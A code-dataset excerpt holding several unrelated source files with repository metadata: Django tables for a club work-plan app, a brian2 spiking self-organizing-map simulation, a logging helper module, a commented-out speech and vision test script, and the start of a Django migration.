fieldname="prefVorstand",
record=record)
def render_bemerkungVorstand (self, value, record):
tmp = format_html (u'<textarea class="textinput textInput" id="id_bemerkungVorstand_{0}" name="bemerkungVorstand_{0}" placeholder="Bemerkung Vorstand" rows=6>{1}</textarea>',
str(record.id),
record.bemerkungVorstand if record.bemerkungVorstand else ""
)
return tmp
class Meta(MeldungTable.Meta):
model = models.Meldung
fields = ('gruppe', 'aufgabe', 'datum', 'stunden',
# 'melder_last', 'melder_first',
'melder',
'bemerkung', 'prefMitglied',
'bemerkungVorstand', 'prefVorstand')
exclude = ('melder_last', 'melder_first',)
##############################
def SaldenTableFactory (l):
attrs = {}
for s in models.Leistung.STATUS:
attrs[s[0]] = LinkedColumn(verbose_name='Leistungs- angabe ' + s[1] + ' (h)')
attrs['zugeteilt'] = LinkedColumn(verbose_name="Zugeteilt insgesamt (h)")
attrs['past'] = django_tables2.Column(
verbose_name="Zuteilungen vergangener Aufgaben (h)")
attrs['future'] = django_tables2.Column(
verbose_name="Zuteilungen zukünftiger Aufgaben (h)")
attrs['nodate'] = django_tables2.Column(
verbose_name="Zuteilungen Aufgaben ohne Datum (h)")
attrs['arbeitslast'] = django_tables2.Column(
verbose_name="Arbeitslast",
accessor="user.mitglied.arbeitslast")
t = NameTableFactory("salden", attrs, l,
kontakt=('user', 'Mitglied'),
meta={'sequence': ('kontakt',
## 'last_name',
## 'first_name',
'arbeitslast',
'zugeteilt',
'past',
'future',
'nodate',
'...')
})
return t
##############################
def ZuteilungsTableFactory (tuple):
l, aufgabenQs = tuple
attrs = {}
attrs['zugeteilt'] = django_tables2.Column(verbose_name=
"Bereits zugeteilt (h)")
attrs['offen'] = django_tables2.Column(verbose_name=
"Noch zuzuteilen (h)")
for a in aufgabenQs:
tag = (unicodedata.normalize('NFKD',
a.aufgabe).encode('ASCII', 'ignore')
)
attrs[tag] = ValuedCheckBoxColumn(
verbose_name=mark_safe((u'<a href="{}">{}</a>, {}h'
'<span style="font-weight:normal">'
u'<br>({})'
u'<br>Benötigt: {}'
u'<br>Zugeteilt: {}'
u'{}'
'</span>'
.format(reverse('arbeitsplan-aufgabenEdit',
args=(a.id,)),
a.aufgabe,
a.stunden,
a.gruppe,
a.anzahl,
a.zuteilung_set.count(),
# the following expression is the same as appears in
# the ZuteilungUebersichtView
# TODO: perhaps move that to class aufgabe, to produce an edit link
# to its stundenplan if it exists?
('<br>' + mark_safe(u'<a href="{0}">Stundenplan</a>'
.format(reverse ('arbeitsplan-stundenplaeneEdit',
args=(a.id,)),
))
if a.has_Stundenplan()
else ''
) + (u"<br><b>UNVOLLSTÄNDIG</b>"
if not a.stundenplan_complete()
else "<br>ok" )
))),
orderable=False)
    # TODO: also add the number required and the number assigned to verbose_name here
t = NameTableFactory('ZuteilungsTable', attrs, l,
kontakt=('mitglied', 'Mitglied'))
return t
##############################
class LeistungTable(django_tables2.Table):
"""
Show the Leistungen of an individual member.
"""
## melder_last = django_tables2.Column (accessor="melder.last_name",
## verbose_name="Melder Nachname")
## melder_first = django_tables2.Column (accessor="melder.first_name",
## verbose_name="Melder Vorname")
aufgabe = django_tables2.Column(accessor="aufgabe.aufgabe",
verbose_name="Aufgabe")
id = django_tables2.LinkColumn('arbeitsplan-leistungDelete',
args=[A('pk')],
verbose_name="Zurückziehen?")
def render_id(self, record):
if ((record.status == models.Leistung.ACK) or
(record.status == models.Leistung.NEG)):
return "---"
else:
return mark_safe(u'<a href="{}">Zurückziehen</a>'.format(
reverse('arbeitsplan-leistungDelete', args=[record.id])
))
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
fields = ( # 'melder_last', 'melder_first',
'aufgabe',
'id',
'wann', 'zeit',
'status',
'bemerkung', 'bemerkungVorstand')
class LeistungBearbeitenTable (RadioButtonTable):
def render_bemerkungVorstand (value, bound_row):
tmp = format_html (u'<textarea class="textinput textInput" id="id_bermerkungVorstand_{0}" name="bemerkungVorstand_{0}" placeholder="Bemerkung Vorstand" rows=6>{1}</textarea>',
str(bound_row._record.id),
bound_row._record.bemerkungVorstand,
)
return tmp
def render_status (self, value, bound_row):
return self.render_radio(bound_row=bound_row,
choices=models.Leistung.STATUS,
buttontexts=models.Leistung.STATUSButtons,
fieldname="status")
bemerkungVorstand = django_tables2.Column(empty_values=(),
verbose_name = "Bemerkungen des Vorstandes")
melder = KontaktColumn()
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
exclude = ("erstellt", "veraendert", 'id', 'benachrichtigt')
sequence = ('melder', 'aufgabe', 'wann', 'zeit',
'bemerkung', 'status', 'bemerkungVorstand')
class BaseEmailTable (RadioButtonTable):
anmerkung = django_tables2.Column(empty_values=(),
verbose_name="Individuelle Anmerkung",
)
sendit = django_tables2.Column(verbose_name="Senden?",
accessor="sendit",
orderable=False,
empty_values=(),
)
def render_sendit(value, bound_row):
tmp = format_html(u'<div class="checkbox"> <input name="sendit_{0}" type="checkbox" {1}></div>',
str(bound_row._record.id),
"checked" if bound_row._record.sendit else "",
)
return tmp
def render_anmerkung(value, bound_row):
tmp = format_html (u'<textarea class="textinput textInput" id="id_anmerkung_{0}"'
' name="anmerkung_{0}" placeholder="Individuelle Anmerkung"'
' rows=4>{1}</textarea>',
str(bound_row._record.id),
bound_row._record.anmerkung,
)
return tmp
class LeistungEmailTable(BaseEmailTable):
# a purely computed field:
schonbenachrichtigt = django_tables2.Column (verbose_name="Schon benachrichtigt?",
orderable=False,
empty_values=(),
)
def render_schonbenachrichtigt(value, bound_row):
return ("Ja"
if (bound_row._record.veraendert <
bound_row._record.benachrichtigt)
else "Nein")
melder = KontaktColumn()
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
exclude = ("erstellt", "veraendert", 'id', 'benachrichtigt')
sequence = ('melder', 'aufgabe', 'wann', 'zeit',
'bemerkung', 'status', 'bemerkungVorstand',
'schonbenachrichtigt',
'anmerkung', 'sendit'
)
class ZuteilungEmailTable(BaseEmailTable):
user = KontaktColumn(verbose_name="Mitglied")
zuteilungBenachrichtigungNoetig = django_tables2.Column(verbose_name="Nötig?",
orderable=False,
empty_values=(),
)
def render_zuteilungBenachrichtigungNoetig(value, bound_row):
return ("Ja"
if bound_row._record.zuteilungBenachrichtigungNoetig
else "Nein")
class Meta:
model = models.Mitglied
attrs = {"class": "paleblue"}
exclude = ('id',
'mitgliedsnummer',
'zustimmungsDatum',
'geburtsdatum',
'strasse',
'plz',
'gender',
'ort',
'erstbenachrichtigt',
'festnetz',
'mobil',
)
sequence = ('user',
'zuteilungsbenachrichtigung',
'zuteilungBenachrichtigungNoetig',
'anmerkung', 'sendit',
)
class MeldungsAufforderungsEmailTable(BaseEmailTable):
user = KontaktColumn(verbose_name="Mitglied")
numMeldungen = django_tables2.Column(verbose_name="# Meldungen",
orderable=False,
empty_values=(),
)
numZuteilungen = django_tables2.Column(verbose_name="# Zuteilungen",
orderable=False,
empty_values=(),
)
stundenZuteilungen = django_tables2.Column(verbose_name="Zuteilungen (Stunden)",
orderable=False,
empty_values=(),
)
def render_numMeldungen(value, bound_row):
return (bound_row._record.gemeldeteAnzahlAufgaben())
def render_numZuteilungen(value, bound_row):
return (bound_row._record.zugeteilteAufgaben())
def render_stundenZuteilungen(value, bound_row):
return (bound_row._record.zugeteilteStunden())
class Meta:
model = models.Mitglied
attrs = {"class": "paleblue"}
exclude = ('id',
'mitgliedsnummer',
'zustimmungsDatum',
'geburtsdatum',
'strasse',
'plz',
'gender',
'ort',
'erstbenachrichtigt',
'festnetz',
'mobil',
'zuteilungsbenachrichtigung',
'zuteilungBenachrichtigungNoetig',
)
sequence = ('user',
'numMeldungen',
'numZuteilungen',
'stundenZuteilungen',
'anmerkung', 'sendit',
)
class ImpersonateTable(django_tables2.Table):
## first_name = django_tables2.Column (accessor="user.first_name")
## last_name = django_tables2.Column (accessor="user.last_name")
mitgliedsnummer = django_tables2.Column(accessor="mitglied.mitgliedsnummer")
id = django_tables2.LinkColumn('impersonate-start',
args=[A('pk')],
verbose_name="Nutzer darstellen",
)
class Meta:
model = User
attrs = {"class": "paleblue"}
fields = ('first_name',
'last_name',
'mitgliedsnummer',
'id',
)
|
apache-2.0
| -1,148,436,846,957,183,600 | 33.7663 | 184 | 0.480138 | false | 4.012411 | false | false | false |
ogvalt/saturn
|
spiking_som.py
|
1
|
18544
|
from brian2 import *
from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import matplotlib.pyplot as plt
from dataset import ArtificialDataSet
class ReceptiveField:
    # Parameter used in the standard deviation definition
gamma = 1.5
def __init__(self, bank_size=10, I_min=0.0, I_max=1.0):
self.bank_size = bank_size
self.field_mu = np.array([(I_min + ((2 * i - 2) / 2) * ((I_max - I_min) / (bank_size - 1)))
for i in range(1, bank_size + 1)])
self.field_sigma = (1.0 / self.gamma) * (I_max - I_min)
def float_to_membrane_potential(self, input_vector):
try:
input_vector = input_vector.reshape((input_vector.shape[0], 1))
except Exception as exc:
print("Exception: {0}\nObject shape: {1}".format(repr(exc), input_vector.shape))
exit(1)
temp = np.exp(-((input_vector - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
temp += np.exp(-((input_vector - 1 - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
temp += np.exp(-((input_vector + 1 - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
return temp
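# Hedged usage sketch (added, not part of the original experiment below):
# encode a scalar with a 10-field bank; each row of the result is the input
# value projected onto overlapping Gaussian receptive fields (with wrap-around
# terms at the +/-1 boundaries) and is later used as the external current I_ext.
#
# rf_demo = ReceptiveField(bank_size=10, I_min=0.05, I_max=0.95)
# print(rf_demo.float_to_membrane_potential(np.array([0.3])).shape)  # -> (1, 10)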
if __name__ == "__main__":
prefs.codegen.target = 'numpy'
np.random.seed(1)
seed(1)
np.set_printoptions(suppress=True)
bank_size = 10
diff_method = 'euler'
# inputs = np.random.rand(3)
# inputs = np.array([0.332, 0.167, 0.946])
# inputs = np.array([0.013, 0.3401, 0.2196])
# inputs = np.array([0.829, 0.7452, 0.6728])
# print(inputs)
# N = inputs.shape[0] * bank_size
N = 20
rf = ReceptiveField(bank_size=bank_size, I_min=0.05, I_max=0.95)
# potential_input = rf.float_to_membrane_potential(inputs)
# potential_input = potential_input.flatten()
# TABLE 1
# (A) Neuronal parameters, used in (1) and (4)
time_step = 0.01;
tau_m = 10.0 * ms;
tau_m_inh = 5 * ms;
tau_m_som = 3 * ms
theta_reset_u = -0.5;
theta_reset_inh = -0.0;
theta_reset_som = 0.0
theta_u = 0.5;
theta_u_inh = 0.01;
theta_som = 0.8
# (B) Synaptic parameters, used in (2) and (3) for different synapse types
# temporal layer to som layer (u to v)
tau_r_afferent = 0.2 * ms;
tau_f_afferent = 1.0 * ms
# temporal layer (u to inh exc, u to inh inh, inh to u)
tau_r_exc = 0.4 * ms;
tau_f_exc = 2.0 * ms;
tau_r_inh = 0.2 * ms;
tau_f_inh = 1.0 * ms
tau_r_inh2u = 1.0 * ms;
tau_f_inh2u = 5.0 * ms
# som layer
tau_r_lateral = 0.1 * ms;
tau_f_lateral = 0.5 * ms
# (C) Maximum magnitudes of synaptic connection strength
w_syn_temporal_to_som_max = 2.2;
w_syn_u2inh_exc_max = 1.0;
w_syn_u2inh_inh_max = 1.0;
w_syn_inh2u_max = 100.0
w_syn_som_to_som_max = 1.0
# (D) Neighbourhood parameters, used in (6) and (7), for layer v (som)
a = 3.0;
b = 3.0;
X = 3.0;
X_ = 3.0
# (E) Learning parameter, used in (5)
# A_plus - Max synaptic strength, A_minus - max synaptic weakness; tau_plus, tau_minus - time constant of STDP
A_plus = 0.0016;
A_minus = 0.0055;
tau_plus = 11;
tau_minus = 10
# used in (7)
T = 10.0;
power_n = 2.0
# used in (6)
pi = np.pi
# size of the self-organizing map
map_size = 10
temporal_layer_neuron_equ = '''
dtime/dt = 1 / ms : 1
# inhibition connection to u layer
ds_inh2u/dt = (-s_inh2u)/tau_r_inh2u: 1
dw_inh2u/dt = (s_inh2u - w_inh2u)/tau_f_inh2u: 1
# membrane potential of u layer
dv/dt = (-v + I_ext - w_inh2u) / tau_m: 1
I_ext : 1
'''
inhibition_neuron_equ = '''
dtime/dt = 1 / ms : 1
# inhibition connection
# s_inh - internal variable
# w_inh - output potential
ds_inh/dt = (-s_inh)/tau_r_inh: 1
dw_inh/dt = (s_inh - w_inh)/tau_f_inh: 1
# excitation connection
# s_exc - internal variable
# w_exc - output potential
ds_exc/dt = (-s_exc)/tau_r_exc: 1
dw_exc/dt = (s_exc - w_exc)/tau_f_exc: 1
# diff equation membrane potential of inhibition neuron
dv/dt = (-v + w_exc - w_inh) / tau_m_inh: 1
'''
som_layer_neuron_equ = '''
dglobal_time/dt = 1 / ms : 1
dtime/dt = 1 / ms : 1
# Afferent connection (from temporal layer to som layer)
ds_afferent/dt = (-s_afferent)/tau_r_afferent: 1
dw_afferent/dt = (s_afferent - w_afferent)/tau_f_afferent: 1
# lateral connection
ds_lateral/dt = (-s_lateral)/tau_r_lateral: 1
dw_lateral/dt = (s_lateral - w_lateral)/tau_f_lateral: 1
    # membrane potential of the som layer (v)
dv/dt = (-v + w_lateral + w_afferent) / tau_m_som: 1
'''
temporal_layer = NeuronGroup(N, temporal_layer_neuron_equ, threshold='v>theta_u', method=diff_method,
reset='''v = theta_reset_u; time = 0''')
# temporal_layer.I_ext = potential_input
# inhibition neuron
inhibition_neuron = NeuronGroup(1, inhibition_neuron_equ, threshold='v>theta_u_inh', method=diff_method,
reset='''v = theta_reset_inh; time = 0''')
# self-organizing layer
som_layer = NeuronGroup(map_size * map_size, som_layer_neuron_equ, threshold='v>theta_som', method=diff_method,
reset='''v = theta_reset_som; time = 0''')
    # u to inh neuron, excitation connection
u2inh_excitation = Synapses(temporal_layer, target=inhibition_neuron, method=diff_method,
on_pre='''
s_exc += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) ** time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_u2inh_exc_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) ** time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_u2inh_exc_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
u2inh_excitation.connect(i=np.arange(N), j=0)
u2inh_excitation.w_syn = 'rand() * w_syn_u2inh_exc_max'
    # u to inh neuron, inhibition connection
u2inh_inhibition = Synapses(temporal_layer, target=inhibition_neuron, method=diff_method,
on_pre='''
s_inh += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) * time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_u2inh_inh_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_u2inh_inh_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
u2inh_inhibition.connect(i=np.arange(N), j=0)
u2inh_inhibition.w_syn = 'rand() * w_syn_u2inh_inh_max'
    # inh neuron to u, inhibition connection
inh2u_inhibition = Synapses(inhibition_neuron, target=temporal_layer, method=diff_method,
on_pre='''
s_inh2u += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) * time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_inh2u_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_inh2u_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
inh2u_inhibition.connect(i=0, j=np.arange(N))
# inh2u_inhibition.w_syn = 'rand() * w_syn_inh2u_max'
inh2u_inhibition.w_syn = 0.5 * w_syn_inh2u_max
# som lateral connection
som_synapse = Synapses(som_layer, target=som_layer, method=diff_method,
on_pre='''
radius = X - (X - X_)/(1+(2**0.5 - 1)*((global_time/T)**(2 * power_n)))
y_pre = floor(i / map_size)
x_pre = i - y_pre * map_size
y_post = floor(j/map_size)
x_post = j - y_post * map_size
dist = (x_post - x_pre)**2 + (y_post - y_pre)**2
G1 = (1 + a) * exp(- dist/(radius**2)) / (2 * pi * radius**2)
G2 = a * exp(- dist/(b * radius)**2) / (2 * pi * (b * radius)**2)
w_syn = clip(G1 + G2, 0, w_syn_som_to_som_max)
s_lateral += w_syn
''',
on_post='''
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
''')
som_synapse.connect(condition='i!=j')
# som afferent connection
temporal_to_som_synapse = Synapses(temporal_layer, target=som_layer, method=diff_method,
on_pre='''
s_afferent += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) ** time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_temporal_to_som_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_temporal_to_som_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
temporal_to_som_synapse.connect()
temporal_to_som_synapse.w_syn = np.random.randint(low=40000, high=60000, size=N*map_size*map_size) \
* w_syn_temporal_to_som_max / 100000.0
# Visualization
som_spike_mon = SpikeMonitor(som_layer)
u_spike_mon = SpikeMonitor(temporal_layer)
# u_state_mon_v = StateMonitor(temporal_layer, 'v', record=True)
# u_state_mon_time = StateMonitor(temporal_layer, 'time', record=True)
# u_state_mon_w = StateMonitor(temporal_layer, 'w_inh2u', record=True)
inh_spike_mon = SpikeMonitor(inhibition_neuron)
# inh_state_mon = StateMonitor(inhibition_neuron, 'v', record=True)
# w_exc_neu_state = StateMonitor(inhibition_neuron, 'w_exc', record=True)
# w_inh_neu_state = StateMonitor(inhibition_neuron, 'w_inh', record=True)
#
# w_syn_u2inh_exc = StateMonitor(u2inh_excitation, 'w_syn', record=True)
defaultclock.dt = time_step * ms
step = 2
plasticity_state = False
u2inh_excitation.plasticity = plasticity_state
u2inh_inhibition.plasticity = plasticity_state
inh2u_inhibition.plasticity = plasticity_state
temporal_to_som_synapse.plasticity = True # plasticity_state
# simulation_time = 200
# run(simulation_time * ms, report='text')
# weight visualization
# simulation
simulation_time = 50
attempts = 5
dataset = ArtificialDataSet(500, int(N/10))
dataset = dataset.generate_set()
np.savetxt('dataset.txt', dataset, delimiter=';')
plt.scatter(dataset[:, 0], dataset[:, 1], s=5)
plt.show()
net_model = Network(collect())
net_model.store()
for vector in dataset:
for it in range(attempts):
net_model.restore()
print("Input vector: {0}, attempt: {1}".format(vector, it))
potential_input = rf.float_to_membrane_potential(vector)
potential_input = potential_input.flatten()
temporal_layer.I_ext = potential_input
net_model.run(simulation_time * ms, report='text')
net_model.store()
# visual
app = QtGui.QApplication([])
win = pg.GraphicsWindow(title="som")
win.resize(1000, 600)
win.setWindowTitle('brain')
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
p1 = win.addPlot(title="Region Selection")
p1.plot(u_spike_mon.t / ms, u_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p1.showGrid(x=True, y=True)
lr = pg.LinearRegionItem([0, simulation_time])
lr.setZValue(0)
p1.addItem(lr)
p2 = win.addPlot(title="Zoom on selected region")
p2.plot(u_spike_mon.t / ms, u_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p2.showGrid(x=True, y=True)
def updatePlot():
p2.setXRange(*lr.getRegion(), padding=0)
def updateRegion():
lr.setRegion(p2.getViewBox().viewRange()[0])
lr.sigRegionChanged.connect(updatePlot)
p2.sigXRangeChanged.connect(updateRegion)
updatePlot()
win.nextRow()
p3 = win.addPlot(title="Region Selection")
p3.plot(som_spike_mon.t / ms, som_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p3.showGrid(x=True, y=True)
lr1 = pg.LinearRegionItem([0, 10])
lr1.setZValue(0)
p3.addItem(lr1)
p4 = win.addPlot(title="Zoom on selected region")
p4.plot(som_spike_mon.t / ms, som_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p4.showGrid(x=True, y=True)
def updatePlot2():
p4.setXRange(*lr1.getRegion(), padding=0)
def updateRegion2():
lr1.setRegion(p4.getViewBox().viewRange()[0])
lr1.sigRegionChanged.connect(updatePlot2)
p4.sigXRangeChanged.connect(updateRegion2)
updatePlot2()
u2som_syn_shape = temporal_to_som_synapse.w_syn[:].shape
picture = temporal_to_som_synapse.w_syn[:].reshape(N, int(u2som_syn_shape[0] / N))
np.savetxt('weights.txt', picture, delimiter=';')
win2 = QtGui.QMainWindow()
win2.resize(800, 800)
imv = pg.ImageView()
win2.setCentralWidget(imv)
win2.show()
win2.setWindowTitle("SOM weights")
imv.setImage(picture)
# subplot(421)
# # subplot(111)
# title("Temporal layer spikes")
# plot(u_spike_mon.t / ms, u_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, N + 1, 1))
#
# # show()
#
# subplot(422)
# title("Inhibition neuron spikes")
# plot(inh_spike_mon.t / ms, inh_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, 1, 1))
#
# subplot(423)
# title("u membrane potential")
# for item in u_state_mon_v:
# plot(u_state_mon_v.t / ms, item.v)
# # plot(u_state_mon_v.t / ms, u_state_mon_v[0].v)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(424)
# title("Inhibition neuron membrane potential")
# plot(inh_state_mon.t / ms, inh_state_mon[0].v)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(425)
# title("Excitation/inhibition interaction")
# plot(w_exc_neu_state.t / ms, w_exc_neu_state[0].w_exc, w_exc_neu_state.t / ms, w_inh_neu_state[0].w_inh,
# w_exc_neu_state.t / ms, w_exc_neu_state[0].w_exc - w_inh_neu_state[0].w_inh)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(426)
# title("Inhibition to u potential")
# plot(u_state_mon_w.t / ms, u_state_mon_w[0].w_inh2u)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(427)
# title("Synaptic Weight")
# for item in w_syn_u2inh_exc:
# plot(w_syn_u2inh_exc.t / ms, item.w_syn)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-0.1, 1.1, 0.1))
#
# subplot(428)
# title("Synaptic time pre spike")
# for item in u_state_mon_time:
# plot(w_syn_u2inh_exc.t / ms, item.time)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# show()
#
# # subplot(111)
# title("Som layer spikes")
# plot(som_spike_mon.t / ms, som_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, map_size * map_size + 1, 1))
#
# show()
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
|
mit
| 4,091,960,593,132,690,000 | 38.04 | 115 | 0.512942 | false | 3.164505 | false | false | false |
alexrudy/Cauldron
|
Cauldron/logger.py
|
1
|
1395
|
# -*- coding: utf-8 -*-
"""
A useful subclass of logger for more fine-grained messaging.
"""
import logging
import weakref
__all__ = ['KeywordMessageFilter']
class Logger(logging.getLoggerClass()):
"""A basic subclass of logger with some useful items."""
def getChild(self, suffix):
"""Get a child logger."""
return logging.getLogger("{0}.{1}".format(self.name, suffix))
def msg(self, msg, *args, **kwargs):
"""Messaging-level logging."""
if self.isEnabledFor(5):
self._log(5, msg, args, **kwargs)
def trace(self, msg, *args, **kwargs):
"""Trace-level logging."""
if self.isEnabledFor(1):
self._log(1, msg, args, **kwargs)
logging.setLoggerClass(Logger)
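# Usage sketch (assumptions: the logger name is arbitrary; the custom MSG (5)
# and TRACE (1) levels sit below DEBUG, so the effective level must be lowered
# before they are emitted):
#
#   import logging
#   logging.addLevelName(5, "MSG")
#   logging.addLevelName(1, "TRACE")
#   log = logging.getLogger("Cauldron.example")
#   log.setLevel(1)
#   log.msg("fine-grained message")
#   log.trace("very fine-grained message")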
class KeywordMessageFilter(logging.Filter):
def __init__(self, keyword):
"""Filter using a keyword."""
logging.Filter.__init__(self)
self._keyword_name = keyword.full_name
self._keyword = weakref.ref(keyword)
def filter(self, record):
"""Filter by applying keyword names."""
record.keyword_name = self._keyword_name
keyword = self._keyword()
if keyword is not None:
record.keyword = repr(keyword)
else:
record.keyword = "<MissingKeyword '{0}'>".format(self._keyword_name)
return True
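# Usage sketch (assumes `keyword` is a Cauldron Keyword-like object exposing a
# `full_name` attribute and supporting weak references):
#
#   handler = logging.StreamHandler()
#   handler.addFilter(KeywordMessageFilter(keyword))
#   handler.setFormatter(logging.Formatter("%(keyword_name)s: %(message)s"))
#   logging.getLogger("Cauldron").addHandler(handler)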
|
bsd-3-clause
| -8,061,825,739,172,878,000 | 26.92 | 80 | 0.581362 | false | 4.090909 | false | false | false |
sprtkd/OpenHmnD
|
object/tst.py
|
1
|
3754
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 09:29:01 2017
@author: Punyajoy Saha
"""
#!/usr/bin/env python
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
#
#import speech2
#
## say() speaks out loud.
#speech2.say("I am speaking out loud.")
#
## input() waits for user input. The prompt text is optional.
##spoken_text = speech2.input("Say something, user!")
##print ("You said: %s" % spoken_text)
#
## You can limit user input to a set of phrases.
#spoken_text = speech2.input("Are you there, user?", ["Yes", "No", "Shut up, computer."])
#print ("You said: %s" % spoken_text)
#
## If you don't want to wait for input, you can use listenfor() to run a callback
## every time a specific phrase is heard. Meanwhile your program can move on to other tasks.
#def L1callback(phrase, listener):
# print ("Heard the phrase: %s" % phrase)
## listenfor() returns a Listener object with islistening() and stoplistening() methods.
#listener1 = speech2.listenfor(["any of", "these will", "match"], L1callback)
#
## You can listen for multiple things at once, doing different things for each.
#def L2callback(phrase, listener):
# print ("Another phrase: %s" % phrase)
#listener2 = speech2.listenfor(["good morning Michael"], L2callback)
#
## If you don't have a specific set of phrases in mind, listenforanything() will
## run a callback every time anything is heard that doesn't match another Listener.
#def L3callback(phrase, listener):
# speech2.say(phrase) # repeat it back
# if phrase == "stop now please":
# # The listener returned by listenfor() and listenforanything()
# # is also passed to the callback.
# listener.stoplistening()
#listener3 = speech2.listenforanything(L3callback)
#
## All callbacks get automatically executed on a single separate thread.
## Meanwhile, you can just do whatever with your program, or sleep.
## As long as your main program is running code, Listeners will keep listening.
#
#import time
#while listener3.islistening(): # till "stop now please" is heard
# time.sleep(1)
#
#assert speech2.islistening() # to at least one thing
#print ("Dictation is now stopped. listeners 1 and 2 are still going.")
#
#listener1.stoplistening()
#print ("Now only listener 2 is going")
#
## Listen with listener2 for a while more, then turn it off.
#time.sleep(30)
#
#speech2.stoplistening() # stop all remaining listeners
#assert not speech2.islistening()
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#print ('item {\n'+' name: "my"'+' name: "my"')
#print (' name: "my"')
#print (' name: "my"')
#print ('}')
#
#import cv2
#import numpy as np
#import random
#roi=cv2.imread('img2.png')
#hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
#cv2.imwrite('imghsv.png',hsv_roi)
#x_max=hsv_roi.shape[0]
#y_max=hsv_roi.shape[1]
#y_10=int(y_max/20)
#x_10=int(x_max/20)
#a=np.zeros((5,3),dtype='uint8')
#x=random.sample(range(int(x_max/2-20),int(x_max/2+20)),5)
#y=random.sample(range(int(y_max/2-10),int(y_max/2+10)),5)
#
#for i in range(0,a.shape[0]):
# a[i,0]=hsv_roi[int(x[i]),int(y[i]),0]
# a[i,1]=hsv_roi[int(x[i]),int(y[i]),1]
# a[i,2]=hsv_roi[int(x[i]),int(y[i]),2]
#max_0=np.max(a[:,0])
#max_1=np.max(a[:,1])
#max_2=np.max(a[:,2])
#min_0=np.min(a[:,0])
#min_1=np.min(a[:,1])
#min_2=np.min(a[:,2])
#
#
#mask = cv2.inRange(hsv_roi, np.array((min_0, min_1,min_2)), np.array((max_0,max_1,max_2)))
#cv2.imwrite('mask.png',mask)
#roi_hist = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
#cv2.normalize(roi_hist,roi_hist,0,255,cv2.NORM_MINMAX)
#term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
|
mit
| 6,885,824,817,186,783,000 | 23.889655 | 93 | 0.641982 | false | 2.492696 | false | false | false |
jrief/djangocms-cascade
|
cmsplugin_cascade/migrations/0029_json_field.py
|
1
|
2323
|
# Generated by Django 3.1.5 on 2021-01-28 15:52
from django.db import migrations, models
def backwards(apps, schema_editor):
print("Migration backward will not restore your `JSONField`s to `CharField`s.")
class Migration(migrations.Migration):
dependencies = [
